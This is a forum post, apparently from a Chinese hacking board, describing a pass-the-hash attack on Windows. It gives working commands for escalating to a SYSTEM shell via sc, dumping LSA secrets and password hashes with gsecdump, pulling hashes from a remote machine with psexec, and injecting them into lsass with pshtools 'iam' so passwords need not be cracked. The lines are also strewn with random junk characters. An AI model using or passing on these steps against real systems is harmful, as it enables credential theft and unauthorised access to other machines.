找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2254|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:, s8 o/ e5 u$ Q# |8 ?5 `8 y

5 }2 k1 M2 T) i1 B2 [C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact4 P$ A  t! C# x7 s
[SC] CreateService SUCCESS
9 e/ }0 {: D9 L4 a8 }# Y; Y
0 R! r& A4 J/ C- V' _C:\>sc start shellcmdline
7 [: h! y# }) s  h6 k" M! }& o[SC] StartService FAILED 1053:
: L9 |5 _( H9 J9 R
9 U  n# f: x; y( P! y5 }The service did not respond to the start or control request in a timely fashion.  q9 R: w6 p' J; n+ ]' i9 e

5 B" P) z# K% dC:\>sc delete shellcmdline
9 s: o+ w$ B  l; i# D[SC] DeleteService SUCCESS
+ W; s1 A  _& \5 ]3 Z- C' l" x+ a  g" P% R. N, I/ c* @
------------! T9 D& `$ A- y! ?; _8 H! D

* c' l3 ]) u: z0 K6 \! ^  QThen in the new DOS window:+ k- V: U: T" W3 z9 B
% E7 j$ r$ M2 L* b
Microsoft Windows XP [Version 5.1.2600]7 B. Y- D1 ?6 Q& e& J; |/ w& P- [
(C) Copyright 1985-2001 Microsoft Corp.! n4 e* l( y5 `/ m  r

9 l) u% j5 ?2 y' }4 t3 sC:\WINDOWS\system32>whoami2 g2 s4 ~" J! X
NT AUTHORITY\SYSTEM
/ y' y5 s; @& C- k" R1 [4 x/ L& y* a+ e* o4 J6 W
C:\WINDOWS\system32>gsecdump -h3 Z1 z3 D. W1 O% ~0 Q4 x& o/ l* F
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)7 b5 g; n. p0 V: b% d+ C+ p
usage: gsecdump [options]
( Q* t3 M( m2 \" J) j; \- H3 }3 z3 `, [% s
options:
+ M# U( U5 `+ k* b+ x2 C0 ~4 U-h [ --help ] show help- O: P- Y  Q# u" z
-a [ --dump_all ] dump all secrets. {; b3 _/ p7 U( {; z$ d! ~' u
-l [ --dump_lsa ] dump lsa secrets
8 ?. Z# r  f% S' Q' i5 A( J-w [ --dump_wireless ] dump microsoft wireless connections" c8 M& H: a* v* r  o* Y3 o. }
-u [ --dump_usedhashes ] dump hashes from active logon sessions3 y' s9 {4 s- a. @0 f8 `! z" X
-s [ --dump_hashes ] dump hashes from SAM/AD4 _8 b+ s; U/ \" [/ e
' \7 J3 y/ L& }! q/ h% N
Although I like to use:
3 t2 z2 t" I5 P9 l+ p  @! |1 _7 F
$ s: L3 d  R+ S! H7 IPsExec v1.83 - Execute processes remotely
3 k% l8 H0 h" Q0 O. e, ^1 n/ YCopyright (C) 2001-2007 Mark Russinovich7 b! N; M' U! e" u2 o  E% e; a
Sysinternals - 链接标记[url]www.sysinternals.com[/url]- b. v9 d; X& @& W( Y% h* r
3 J& f9 o8 [3 ~1 q
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT( u) a- m/ K! m# A+ n* W, n

* r. Q. y3 E% E8 o9 Nto get the hashes from active logon sessions of a remote system.
" W+ G0 @8 l: g
( V, y7 o0 V# h( fThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.% p2 b" a0 s5 a1 y
& z- N# x. d( p+ z
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.# y) M' [& E  I! D0 ]
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]. H" u4 V$ m+ X3 O$ Y; S
. u+ W: A7 L3 m1 \
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。6 H# C; f, Z+ M8 r' u4 ]( k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表